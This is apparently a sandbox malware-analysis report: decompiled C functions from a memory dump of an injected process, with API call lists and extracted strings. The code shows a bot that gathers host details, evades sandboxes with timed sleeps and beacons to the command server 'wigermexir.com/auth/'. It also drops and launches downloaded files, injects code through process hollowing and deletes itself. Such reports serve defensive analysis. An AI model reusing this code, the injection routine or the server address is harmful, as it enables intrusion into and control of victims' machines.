						_t152 =  *0x77c37c; // 0x0
						E00771164(_t152,  &_v4253);
						E0077133C(_v40,  &_v4253);
						_t157 =  *0x77a0b4; // 0x771c70
						E0077133C(_v40, _t157);
						E00778258( &_v4253);
						E0077133C(_v40,  &_v4253);
						_t165 =  *0x77a0b8; // 0x771c78
						E0077133C(_v40, _t165);
						E0077133C(_v40, 0x778984);
						_t170 =  *0x77a0c4; // 0x771c94
						E0077133C(_v40, _t170);
						_t174 =  *0x77c355; // 0x0
						E00771864(_t174,  &_v4253);
						E0077133C(_v40,  &_v4253);
						_t317 = _t301 + 0x80;
						__eflags = _v4382;
						if(_v4382 != 0) {
							E0077133C(_v40,  &_v4382);
							_t317 = _t317 + 8;
						}
						_t179 =  *0x77a1bc; // 0x771ef8
						E0077133C(_v40, _t179);
						E00774154( &_v4253);
						E0077133C(_v40,  &_v4253);
						_t187 =  *0x77a0c8; // 0x771c9c
						E0077133C(_v40, _t187);
						_t301 = _t317 + 0x18;
						_v8 = 0;
						_v44 = GetTickCount();
						__eflags = _v44 - 0x3a98;
						if(_v44 < 0x3a98) {
							__eflags = 0x3a98;
							Sleep(0x3a98 - _v44);
						}
						_t195 = E007712DC(_v40);
						_t198 =  *0x77c230; // 0x7723ae
						_t199 =  *0x77b784; // 0xd4
						_v12 = E00775D20(_t281, _t199 &  *0x77a074, _t198,  &_v156, "wigermexir.com/auth/", 0x77c355, _v40, _t195,  &_v16,  &_v20);
						__eflags = _v12;
						if(_v12 == 0) {
							break;
						}
						_t289 =  *0x77a240; // 0x7720a8
						_v36 = E00771110(_v16, _t289);
						_v24 = _v16;
						_t220 =  *0x77c355; // 0x0
						 *0x77b64d = _t220;
						 *0x77b780 = E00775468();
						E00777474(0x77b61c, __eflags);
						_t290 =  *0x77a1a8; // 0x771ecc
						__eflags =  *_v24 -  *_t290;
						if( *_v24 ==  *_t290) {
							L21:
							E00771440(_v16);
							do {
								_v48 = _v48 + 1;
								Sleep(0x3e8);
								_v52 = _v52 + 1;
								_t228 =  *0x77b715; // 0x12c
								__eflags = _t228 - _v48;
							} while (__eflags > 0);
							continue;
						}
						_v56 = 0;
						_v28 = 0;
						_t291 =  *0x77a190; // 0x771e8c
						_v28 = E00771110(_v24, _t291);
						__eflags = _v28;
						if(_v28 == 0) {
							_t292 =  *0x77a18c; // 0x771e7c
							_v28 = E00771110(_v24, _t292);
						} else {
							_v56 = 0xffffffff;
						}
						__eflags = _v28;
						if(_v28 != 0) {
							_v44 = _v28 - _v24;
							_v28 = _v28 + 0xd;
							_v36 = E00771110(_v28, E00778988);
							_v32 = _v36 - _v28;
							_t281 = _v32;
							E007712B8( &_v4253, _v32, _v28);
							 *((char*)(_t300 + _v32 - 0x1099)) = 0;
							_v32 = E007710E0( &_v4253, _v28);
							_t269 = _v36 + 2;
							__eflags = _t269;
							_v28 = _t269;
							 *((char*)(_v24 + _v44)) = 0;
						}
						__eflags = _v56;
						if(__eflags == 0) {
							L19:
							_t236 = E00777F20(_v24, _t281, 4);
							__eflags = _t236;
							if(_t236 != 0) {
								E007780C0(_v56);
								E00771440(_v40);
								E00771440(_v16);
								_push(0);
								RtlExitUserThread();
							}
							goto L21;
						} else {
							_t281 = _v32;
							__eflags = E007782F8(_v24, _v32, _v28, __eflags);
							if(__eflags == 0) {
								E00771440(_v16);
								continue;
							}
							E007780C0(_v56);
							E00771440(_v40);
							E00771440(_v16);
							_push(0);
							RtlExitUserThread();
							goto L19;
						}
					}
					_t202 =  *0x77c355; // 0x0
					_v4428 = _t202;
					E00771308( &_v4424, 0x77c384);
					_t205 =  *0x77b651; // 0x5b3bfa2c
					_t208 =  *0x77b784; // 0xd4
					_t281 =  *0x77b780; // 0x5b3bfa2c
					__eflags = E0077660C(_t208 &  *0x77a074, _t281, 0x77b625, __eflags, 0x77ba00,  &_v4428,  &_v4253, _t205);
					if(__eflags != 0) {
						E00771308(0x77b625,  &_v4253);
						E00771308(0x77c254,  &_v4253);
					}
					 *0x77c355 = _v4428;
					 *0x77b64d = _v4428;
				}
			}

0x007784b4
0x007784c1
0x007784c6
0x007784cb
0x007784ce
0x007784dc
0x007784de
0x007784e3
0x007784f4
0x007784f9
0x007784f9
0x00778501
0x0077850b
0x00778512
0x00000000
0x00000000
0x00778519
0x00778519
0x00778521
0x00778521
0x00778523
0x0077852e
0x00778533
0x0077853c
0x0077854a
0x00778552
0x0077855c
0x0077856b
0x00778571
0x00778584
0x0077858c
0x00778596
0x007785a5
0x007785ab
0x007785be
0x007785c6
0x007785d0
0x007785de
0x007785e3
0x007785f3
0x007785fb
0x00778605
0x00778613
0x00778623
0x0077862b
0x00778635
0x00778646
0x0077864e
0x00778658
0x00778667
0x0077866d
0x00778680
0x00778685
0x00778688
0x0077868f
0x0077869c
0x007786a1
0x007786a1
0x007786a4
0x007786ae
0x007786bc
0x007786cc
0x007786d4
0x007786de
0x007786e3
0x007786e8
0x007786f1
0x007786f4
0x007786fb
0x00778702
0x00778706
0x00778706
0x00778717
0x00778732
0x00778738
0x00778749
0x0077874c
0x00778750
0x00000000
0x00000000
0x00778756
0x00778764
0x0077876a
0x0077876d
0x00778772
0x0077877c
0x00778786
0x00778790
0x00778796
0x00778798
0x007788bc
0x007788bf
0x00778957
0x00778957
0x0077895f
0x00778965
0x00778968
0x0077896d
0x0077896d
0x00000000
0x00778972
0x007787a0
0x007787a5
0x007787a8
0x007787b6
0x007787b9
0x007787bd
0x007787c8
0x007787d6
0x007787bf
0x007787bf
0x007787bf
0x007787d9
0x007787dd
0x007787e5
0x007787ee
0x007787fe
0x00778807
0x00778810
0x00778816
0x0077881e
0x00778831
0x00778837
0x00778837
0x0077883a
0x00778843
0x00778843
0x00778847
0x0077884b
0x0077888e
0x00778893
0x00778898
0x0077889a
0x0077889f
0x007788a7
0x007788af
0x007788b4
0x007788b6
0x007788b6
0x00000000
0x0077884d
0x0077884d
0x0077885b
0x0077885d
0x00778884
0x00000000
0x00778884
0x00778862
0x0077886a
0x00778872
0x00778877
0x00778879
0x00000000
0x00778879
0x0077884b
0x007788c9
0x007788ce
0x007788df
0x007788e4
0x00778902
0x0077890d
0x00778918
0x0077891a
0x00778927
0x00778937
0x00778937
0x00778942
0x0077894d
0x0077894d

APIs

Part of subcall function 007713DC: GetProcessHeap.KERNEL32(00000000,?), ref: 007713EB
Part of subcall function 007713DC: RtlAllocateHeap.NTDLL(00000000), ref: 007713F2

Sleep.KERNEL32(00004E20), ref: 00778519

Part of subcall function 007764BC: GetVersionExA.KERNEL32(0000009C), ref: 00776530

Part of subcall function 00771864: wsprintfA.USER32 ref: 00771874

Part of subcall function 00778258: WSAStartup.WS2_32(00000101,?), ref: 00778276
Part of subcall function 00778258: gethostname.WS2_32(?,00000040), ref: 00778282
Part of subcall function 00778258: gethostbyname.WS2_32(?), ref: 0077828C
Part of subcall function 00778258: inet_ntoa.WS2_32(?), ref: 007782B6
Part of subcall function 00778258: WSACleanup.WS2_32 ref: 007782E9

Part of subcall function 00774154: GetKeyboardLayoutList.USER32(00000009,?), ref: 00774169

GetTickCount.KERNEL32 ref: 007786EB
Sleep.KERNEL32(00003A98), ref: 00778706

Part of subcall function 00775468: GetSystemTime.KERNEL32(?), ref: 00775472

Part of subcall function 00777474: RegCreateKeyExA.ADVAPI32(80000002,007721A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 0077750D
Part of subcall function 00777474: RegCreateKeyExA.ADVAPI32(80000001,007721A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00777533

RtlExitUserThread.NTDLL(00000000), ref: 007788B6

Part of subcall function 007782F8: GetTempPathA.KERNEL32(00000201,?), ref: 00778364
Part of subcall function 007782F8: Sleep.KERNEL32(000005DC), ref: 007783E3
Part of subcall function 007782F8: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0077840C
Part of subcall function 007782F8: wsprintfA.USER32 ref: 00778476

RtlExitUserThread.NTDLL(00000000), ref: 00778879

Part of subcall function 007780C0: RtlRemoveVectoredExceptionHandler.NTDLL(00000000), ref: 007780DB
Part of subcall function 007780C0: CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000), ref: 007780E9
Part of subcall function 007780C0: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00778106
Part of subcall function 007780C0: CloseHandle.KERNEL32(00000000), ref: 00778112
Part of subcall function 007780C0: SendMessageA.USER32(0006024A,00000010,00000000,00000000), ref: 00778184
Part of subcall function 007780C0: SHDeleteKeyA.SHLWAPI(80000002,007721A4), ref: 007781BB
Part of subcall function 007780C0: SHDeleteKeyA.SHLWAPI(80000001,007721A4), ref: 007781FB
Part of subcall function 007780C0: ReleaseMutex.KERNEL32(00000230), ref: 00778221
Part of subcall function 007780C0: CloseHandle.KERNEL32(00000230), ref: 0077822D
Part of subcall function 007780C0: ExitProcess.KERNEL32 ref: 00778244

Part of subcall function 00771440: GetProcessHeap.KERNEL32(00000000,?), ref: 0077144D
Part of subcall function 00771440: HeapFree.KERNEL32(00000000), ref: 00771454

Part of subcall function 0077660C: Sleep.KERNEL32(000927C0), ref: 007766F5
Part of subcall function 0077660C: GetTickCount.KERNEL32 ref: 007766FD
Part of subcall function 0077660C: GetTickCount.KERNEL32 ref: 007767AF
Part of subcall function 0077660C: Sleep.KERNEL32(00001388), ref: 007767CD
Part of subcall function 0077660C: Sleep.KERNEL32(000493E0), ref: 007767F3
Part of subcall function 0077660C: Sleep.KERNEL32(000927C0), ref: 0077680F

Sleep.KERNEL32(000003E8), ref: 0077895F

Strings

1530474054, xrefs: 00778541
wigermexir.com/auth/, xrefs: 00778726, 007788FD, 00778922

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 0077660C, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 214
sleep

C-Code - Quality: 95%

			E0077660C(intOrPtr __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _v48;
				intOrPtr _v52;
				char _v181;
				char _v264;
				char _v329;
				char _v394;
				intOrPtr _t116;
				intOrPtr _t123;
				signed int _t131;
				signed int _t151;
				intOrPtr _t154;
				signed int _t155;
				intOrPtr _t175;
				intOrPtr _t195;
				void* _t201;
				void* _t202;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v20 = 0;
				E007764BC( &_v264, 0x51, __eflags);
				_v36 = E00771110(_v12, E00776900);
				_v40 = _v36 - _v12;
				E007712B8( &_v329, _v40, _v12);
				 *((char*)(_t201 + _v40 - 0x145)) = 0;
				E00771308( &_v394,  &_v329);
				_v44 = 1;
				L1:
				while(1) {
					if(_v44 % 0x32 == 0 || _v44 == 1) {
						L3:
						_t184 = _a8;
						_t116 =  *0x77a194; // 0x771e9c
						_v24 = E00775AE8(_t116, _a8, 0);
						if(_v24 == 0) {
							Sleep(0x927c0);
							goto L3;
						}
						_t123 =  *0x77c230; // 0x7723ae
						_v24 = E00775D20(_t184, _v8, _t123,  &_v264, _v12, _a8, 0, 0,  &_v28,  &_v32);
						if(_v24 == 0) {
							goto L7;
						} else {
							E00771440(_v28);
							_v20 = 0;
							goto L39;
						}
					} else {
						L7:
						_v48 = GetTickCount();
						_t195 =  *0x77c230; // 0x7723ae
						E00776340( &_v329, 0x94, _t195, __eflags);
						_v24 = 0;
						_t131 = E00771110(_a4,  &_v329);
						__eflags = _t131;
						if(_t131 == 0) {
							E00771308( &_v181,  &_v329);
							E0077133C( &_v181, _v36);
							_t202 = _t202 + 8;
							_t175 =  *0x77c230; // 0x7723ae
							_v24 = E00775D20(0x94, _v8, _t175,  &_v264,  &_v181, _a8, 0, 0,  &_v28,  &_v32);
						}
						__eflags = _v24;
						if(_v24 == 0) {
							_v48 = GetTickCount() - _v48;
							__eflags = _v48 - 0x1388;
							if(_v48 < 0x1388) {
								__eflags = 0x1388;
								Sleep(0x1388 - _v48);
							}
							_v52 = E00775468();
							__eflags = _v44 - 5;
							if(_v44 != 5) {
								L19:
								__eflags = _v52 - _v16 - 0x3f480;
								if(_v52 - _v16 >= 0x3f480) {
									__eflags = _v52 - _v16 - 0x3f480;
									if(_v52 - _v16 <= 0x3f480) {
										L28:
										__eflags = _v52 - _v16 - 0x7e900;
										if(_v52 - _v16 <= 0x7e900) {
											L33:
											__eflags = _v52 - _v16 - 0xd2f00;
											if(_v52 - _v16 > 0xd2f00) {
												__eflags = _v44 - 0x12c;
												if(_v44 != 0x12c) {
													_t95 =  &_v44;
													 *_t95 = _v44 + 1;
													__eflags =  *_t95;
												} else {
													_v44 = 1;
												}
											}
											L37:
											__eflags = _v44 - 1;
											if(__eflags == 0) {
												E00771308( &_v329,  &_v394);
											}
											continue;
										}
										__eflags = _v52 - _v16 - 0xd2f00;
										if(_v52 - _v16 >= 0xd2f00) {
											goto L33;
										}
										__eflags = _v44 - 0xc8;
										if(_v44 != 0xc8) {
											_v44 = _v44 + 1;
										} else {
											_v44 = 1;
										}
										goto L37;
									}
									__eflags = _v52 - _v16 - 0x7e900;
									if(_v52 - _v16 >= 0x7e900) {
										goto L28;
									}
									__eflags = _v44 - 0x64;
									if(_v44 != 0x64) {
										_v44 = _v44 + 1;
									} else {
										_v44 = 1;
									}
									goto L37;
								}
								__eflags = _v44 - 0x32;
								if(_v44 != 0x32) {
									_v44 = _v44 + 1;
								} else {
									_v44 = 1;
								}
								goto L37;
							} else {
								__eflags = _v52 - _a16 - 0x927c0;
								if(_v52 - _a16 >= 0x927c0) {
									goto L19;
								}
								Sleep(0x493e0);
								_t151 = E00775620();
								asm("sbb eax, eax");
								__eflags =  ~( ~_t151);
								if( ~( ~_t151) == 0) {
									while(1) {
										_t154 =  *0x77a194; // 0x771e9c
										_t155 = E00775AE8(_t154, _a8, 0);
										asm("sbb eax, eax");
										__eflags =  ~( ~_t155);
										if( ~( ~_t155) != 0) {
											goto L19;
										}
										Sleep(0x927c0);
									}
								}
								goto L19;
							}
						} else {
							E00771308(_a12,  &_v181);
							E00771440(_v28);
							_v20 = 0xffffffff;
							L39:
							return _v20;
						}
					}
				}
			}

0x00776615
0x00776618
0x0077661b
0x00776620
0x0077662b
0x0077663d
0x00776646
0x00776655
0x0077665d
0x00776671
0x00776676
0x00000000
0x0077667d
0x0077668b
0x00776693
0x00776693
0x00776698
0x007766a2
0x007766a9
0x007766f5
0x00000000
0x007766f5
0x007766c6
0x007766d5
0x007766dc
0x00000000
0x007766de
0x007766e1
0x007766e8
0x00000000
0x007766e8
0x007766fd
0x007766fd
0x00776703
0x00776711
0x00776717
0x0077671e
0x0077672a
0x0077672f
0x00776731
0x0077673f
0x0077674f
0x00776754
0x00776775
0x00776784
0x00776784
0x00776787
0x0077678b
0x007767b8
0x007767bb
0x007767c2
0x007767c9
0x007767cd
0x007767cd
0x007767d8
0x007767db
0x007767df
0x0077682e
0x00776834
0x00776839
0x0077685b
0x00776860
0x00776883
0x00776889
0x0077688e
0x007768b4
0x007768ba
0x007768bf
0x007768c1
0x007768c8
0x007768d3
0x007768d3
0x007768d3
0x007768ca
0x007768ca
0x007768ca
0x007768c8
0x007768d6
0x007768d6
0x007768da
0x007768ec
0x007768ec
0x00000000
0x007768da
0x00776896
0x0077689b
0x00000000
0x00000000
0x0077689d
0x007768a4
0x007768af
0x007768a6
0x007768a6
0x007768a6
0x00000000
0x007768a4
0x00776868
0x0077686d
0x00000000
0x00000000
0x0077686f
0x00776873
0x0077687e
0x00776875
0x00776875
0x00776875
0x00000000
0x00776873
0x0077683b
0x0077683f
0x0077684d
0x00776841
0x00776841
0x00776841
0x00000000
0x007767e1
0x007767e7
0x007767ec
0x00000000
0x00000000
0x007767f3
0x007767f9
0x00776800
0x00776804
0x00776806
0x00776815
0x0077681a
0x0077681f
0x00776826
0x0077682a
0x0077682c
0x00000000
0x00000000
0x0077680f
0x0077680f
0x00776815
0x00000000
0x00776806
0x0077678d
0x00776796
0x0077679e
0x007767a3
0x007768f6
0x007768fc
0x007768fc
0x0077678b
0x0077668b

APIs

Part of subcall function 007764BC: GetVersionExA.KERNEL32(0000009C), ref: 00776530

Sleep.KERNEL32(000927C0), ref: 007766F5
GetTickCount.KERNEL32 ref: 007766FD

Part of subcall function 00771440: GetProcessHeap.KERNEL32(00000000,?), ref: 0077144D
Part of subcall function 00771440: HeapFree.KERNEL32(00000000), ref: 00771454

GetTickCount.KERNEL32 ref: 007767AF
Sleep.KERNEL32(00001388), ref: 007767CD

Part of subcall function 00775468: GetSystemTime.KERNEL32(?), ref: 00775472

Sleep.KERNEL32(000493E0), ref: 007767F3
Sleep.KERNEL32(000927C0), ref: 0077680F

Strings

d, xrefs: 0077686F

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 007782F8, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106
processsleep

C-Code - Quality: 100%

			E007782F8(intOrPtr __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v541;
				char _v1054;
				struct _STARTUPINFOA _v1124;
				struct _PROCESS_INFORMATION _v1140;
				intOrPtr _t41;
				intOrPtr _t57;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t77;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v20 = 0;
				_v24 = E00777CFC(_v12);
				E00771258( &_v1124, 0x44);
				_v1124.cb = 0x44;
				if(_v24 == 0) {
					_t41 =  *0x77a168; // 0x771dec
					E00777290(_t41);
				} else {
					_v28 = E00771110(_v8, 0x778494);
					_t96 = _v28;
					if(_v28 != 0) {
						GetTempPathA(0x201,  &_v1054);
						E00777560( &_v1054, 0x778494, _t96);
						E00771308( &_v541, 0x77849c);
						E0077133C( &_v541,  &_v1054);
						E0077133C( &_v541, 0x77849c);
						_t57 =  *0x77a0a8; // 0x771c4c
						E0077133C( &_v541, _t57);
						if( *((char*)(_v28 + 4)) != 0x31) {
							 *0x77b514 = 0;
							_t62 =  *0x77b510; // 0x790000
							E00771828(_t62);
							E007713B4(0x77b510, _v16);
							_t66 =  *0x77b510; // 0x790000
							E007712B8(_t66, _v16, _v12);
							 *0x77b514 = _v16;
							 *0x77be1c = 0;
							wsprintfA("1530474054", 0x7784a0, _v24);
						} else {
							E0077485C( &_v1054, _v16, _v12);
							Sleep(0x5dc);
							if(CreateProcessA(0,  &_v541, 0, 0, 0, 0, 0, 0,  &_v1124,  &_v1140) == 0) {
								_t77 =  *0x77a174; // 0x771e10
								E00777290(_t77);
							} else {
								_v20 = 0xffffffff;
							}
						}
					}
				}
				return _v20;
			}

0x00778301
0x00778304
0x00778307
0x0077830c
0x00778317
0x00778325
0x0077832a
0x00778338
0x00778481
0x00778486
0x0077833e
0x0077834b
0x0077834e
0x00778352
0x00778364
0x00778370
0x00778380
0x00778393
0x007783a7
0x007783af
0x007783bc
0x007783cb
0x0077842d
0x00778432
0x00778437
0x00778444
0x0077844f
0x00778454
0x0077845c
0x00778461
0x00778476
0x007783cd
0x007783d9
0x007783e3
0x00778414
0x0077841f
0x00778424
0x00778416
0x00778416
0x00778416
0x00778414
0x007783cb
0x00778352
0x00778491

APIs

GetTempPathA.KERNEL32(00000201,?), ref: 00778364
Sleep.KERNEL32(000005DC), ref: 007783E3
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0077840C

Part of subcall function 00771828: VirtualFree.KERNEL32(?,00000000,00008000,?,?,00776A2F), ref: 0077183A

Part of subcall function 007713B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 007713CD

wsprintfA.USER32 ref: 00778476

Part of subcall function 0077485C: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00774886
Part of subcall function 0077485C: WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 007748A7
Part of subcall function 0077485C: FlushFileBuffers.KERNEL32(000000FF), ref: 007748C4
Part of subcall function 0077485C: CloseHandle.KERNEL32(000000FF), ref: 007748CE

Part of subcall function 00777290: CreateThread.KERNEL32(00000000,00000000,Function_00007278,?,00000000,?), ref: 007772AC
Part of subcall function 00777290: CloseHandle.KERNEL32(?), ref: 007772B9

Strings

1530474054, xrefs: 00778461, 00778471
D, xrefs: 0077832A
>UD , xrefs: 0077833E

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00779347, Relevance: 9.1, APIs: 6, Instructions: 82

C-Code - Quality: 75%

			E00779347() {
				intOrPtr _t24;
				intOrPtr _t32;
				intOrPtr _t42;
				intOrPtr* _t47;
				intOrPtr* _t49;
				void* _t51;

				if( *_t49() != 0) {
					 *_t47(0);
				}
				if(E0077453C(GetCurrentProcess()) == 0) {
					GetWindowsDirectoryA(_t51 - 0x218, 0x101);
					E0077133C(_t51 - 0x218, 0x77946c);
				} else {
					GetWindowsDirectoryA(_t51 - 0x218, 0x101);
					_t42 =  *0x77a0b0; // 0x771c64
					E0077133C(_t51 - 0x218, _t42);
				}
				_t24 =  *0x77a08c; // 0x771c00
				E0077133C(_t51 - 0x218, _t24);
				 *((intOrPtr*)(_t51 - 0xc)) = E00775028(_t51 - 0x218, 0, E00779080, _t51 - 0x117, 0xffffffff, 0xfa0);
				if( *((intOrPtr*)(_t51 - 0xc)) == 0xffffffff) {
					 *0x77b21c(0, _t51 - 0x218, 0x26, 0xffffffff);
					_t32 =  *0x77a0dc; // 0x771ce8
					E0077133C(_t51 - 0x218, _t32);
					if(PathFileExistsA(_t51 - 0x218) != 0) {
						 *((intOrPtr*)(_t51 - 0xc)) = E00775028(_t51 - 0x218, 0, E00779080, _t51 - 0x117, 0xffffffff, 0xfa0);
					}
				}
				ExitProcess(0);
			}

0x0077934c
0x00779350
0x00779352
0x00779366
0x0077939d
0x007793af
0x00779368
0x00779374
0x0077937a
0x00779387
0x0077938c
0x007793b7
0x007793c4
0x007793f0
0x007793f7
0x00779406
0x0077940c
0x00779419
0x00779430
0x00779456
0x00779456
0x00779430
0x0077945b

APIs

GetCurrentProcess.KERNEL32 ref: 00779359

Part of subcall function 0077453C: GetCurrentProcess.KERNEL32 ref: 00774555
Part of subcall function 0077453C: IsWow64Process.KERNELBASE(00000000,?), ref: 0077456F

GetWindowsDirectoryA.KERNEL32(?,00000101), ref: 00779374
GetWindowsDirectoryA.KERNEL32(?,00000101), ref: 0077939D

Part of subcall function 00775028: GetModuleHandleA.KERNEL32(00000000), ref: 00775040
Part of subcall function 00775028: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0077508F
Part of subcall function 00775028: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,?), ref: 007750F5
Part of subcall function 00775028: MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 0077510D
Part of subcall function 00775028: GetThreadContext.KERNEL32(?,00010007), ref: 00775209
Part of subcall function 00775028: VirtualProtectEx.KERNEL32(?,00000000,0000029B,00000040,?), ref: 00775252
Part of subcall function 00775028: WriteProcessMemory.KERNEL32(?,00000000,?,0000029B,?), ref: 0077526C
Part of subcall function 00775028: ResumeThread.KERNEL32(?), ref: 0077527E
Part of subcall function 00775028: WaitForSingleObject.KERNEL32(?,00000000), ref: 00775292
Part of subcall function 00775028: GetExitCodeProcess.KERNEL32(?,?), ref: 007752A4
Part of subcall function 00775028: CloseHandle.KERNEL32(?), ref: 007752BE
Part of subcall function 00775028: CloseHandle.KERNEL32(?), ref: 007752C8

SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,000000FF), ref: 00779406
PathFileExistsA.SHLWAPI(?), ref: 00779428
ExitProcess.KERNEL32 ref: 0077945B

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00777C4E, Relevance: 9.1, APIs: 6, Instructions: 66
file

C-Code - Quality: 100%

			E00777C4E(CHAR* __eax) {
				CHAR* _v8;
				intOrPtr _v12;
				void* _v16;
				long _v20;
				intOrPtr _v24;
				void _v84;
				intOrPtr _v100;
				void _v104;

				_v8 = __eax;
				_v12 = 0;
				_v16 = CreateFileA(_v8, 0x80000000, 1, 0, 3, 0, 0);
				if(_v16 == 0xffffffff) {
					_v16 = CreateFileA(_v8, 0x80000000, 0, 0, 3, 0, 0);
				}
				if(_v16 != 0xffffffff) {
					ReadFile(_v16,  &_v84, 0x40,  &_v20, 0);
					SetFilePointer(_v16, _v24 + 4, 0, 0);
					ReadFile(_v16,  &_v104, 0x14,  &_v20, 0);
					CloseHandle(_v16);
					_v12 = _v100;
				}
				return _v12;
			}

0x00777c56
0x00777c5b
0x00777c77
0x00777c7e
0x00777c99
0x00777c99
0x00777ca0
0x00777cb2
0x00777cc7
0x00777cdd
0x00777ce7
0x00777cf0
0x00777cf0
0x00777cf9

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00777C71
CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00777C93
ReadFile.KERNEL32(000000FF,?,00000040,?,00000000), ref: 00777CB2
SetFilePointer.KERNEL32(000000FF,?,00000000,00000000), ref: 00777CC7
ReadFile.KERNEL32(000000FF,?,00000014,?,00000000), ref: 00777CDD
CloseHandle.KERNEL32(000000FF), ref: 00777CE7

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00777C50, Relevance: 9.1, APIs: 6, Instructions: 65
file

C-Code - Quality: 100%

			E00777C50(CHAR* __eax) {
				CHAR* _v8;
				intOrPtr _v12;
				void* _v16;
				long _v20;
				intOrPtr _v24;
				void _v84;
				intOrPtr _v100;
				void _v104;

				_v8 = __eax;
				_v12 = 0;
				_v16 = CreateFileA(_v8, 0x80000000, 1, 0, 3, 0, 0);
				if(_v16 == 0xffffffff) {
					_v16 = CreateFileA(_v8, 0x80000000, 0, 0, 3, 0, 0);
				}
				if(_v16 != 0xffffffff) {
					ReadFile(_v16,  &_v84, 0x40,  &_v20, 0);
					SetFilePointer(_v16, _v24 + 4, 0, 0);
					ReadFile(_v16,  &_v104, 0x14,  &_v20, 0);
					CloseHandle(_v16);
					_v12 = _v100;
				}
				return _v12;
			}

0x00777c56
0x00777c5b
0x00777c77
0x00777c7e
0x00777c99
0x00777c99
0x00777ca0
0x00777cb2
0x00777cc7
0x00777cdd
0x00777ce7
0x00777cf0
0x00777cf0
0x00777cf9

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00777C71
CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00777C93
ReadFile.KERNEL32(000000FF,?,00000040,?,00000000), ref: 00777CB2
SetFilePointer.KERNEL32(000000FF,?,00000000,00000000), ref: 00777CC7
ReadFile.KERNEL32(000000FF,?,00000014,?,00000000), ref: 00777CDD
CloseHandle.KERNEL32(000000FF), ref: 00777CE7

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00774A68, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
registry

C-Code - Quality: 92%

			E00774A68(intOrPtr __eax) {
				intOrPtr _v8;
				signed int _v12;
				long _v16;
				signed int _v20;
				void* _v24;
				char _v153;
				int _t30;
				char* _t32;
				intOrPtr _t37;
				signed int _t52;
				signed char _t62;
				intOrPtr _t67;

				_v8 = __eax;
				_v12 = 0;
				_v16 = 0x81;
				_t30 = GetComputerNameA( &_v153,  &_v16);
				_t72 = _t30;
				if(_t30 != 0) {
					_v12 = E00771740( &_v153);
				}
				_t32 =  *0x77a25c; // 0x772174
				RegOpenKeyExA(0x80000002, _t32, 0, 0x20119,  &_v24);
				_v16 = 4;
				_v20 = 0;
				_t37 =  *0x77a0f0; // 0x771d3c
				E007738B0(_v24, _t37, 0, 0,  &_v20,  &_v16);
				E00773890(_v24);
				_v12 = _v12 ^ _v20 ^ 0x4c8aa297;
				E00771164(_v12,  &_v153);
				 *0x77a064 = E007744F0(_t72);
				 *0x77a068 = E007742D4(GetCurrentProcess());
				if(E007744F0(_t72) >= 0x3c) {
					_t52 = E007742D4(GetCurrentProcess());
					__eflags = _t52 - 3;
					_t21 = _t52 == 3;
					__eflags = _t21;
					asm("sbb eax, eax");
					 *0x77a034 =  ~(_t52 & 0xffffff00 | _t21);
				} else {
					_t62 = E007741CC();
					asm("sbb eax, eax");
					 *0x77a034 =  ~_t62;
				}
				if( *0x77a034 != 0) {
					_t67 =  *0x77a09c; // 0x771c30
					E00771308(_v8, _t67);
				}
				E0077133C(_v8, 0x774b9c);
				return E0077133C(_v8,  &_v153);
			}

0x00774a71
0x00774a76
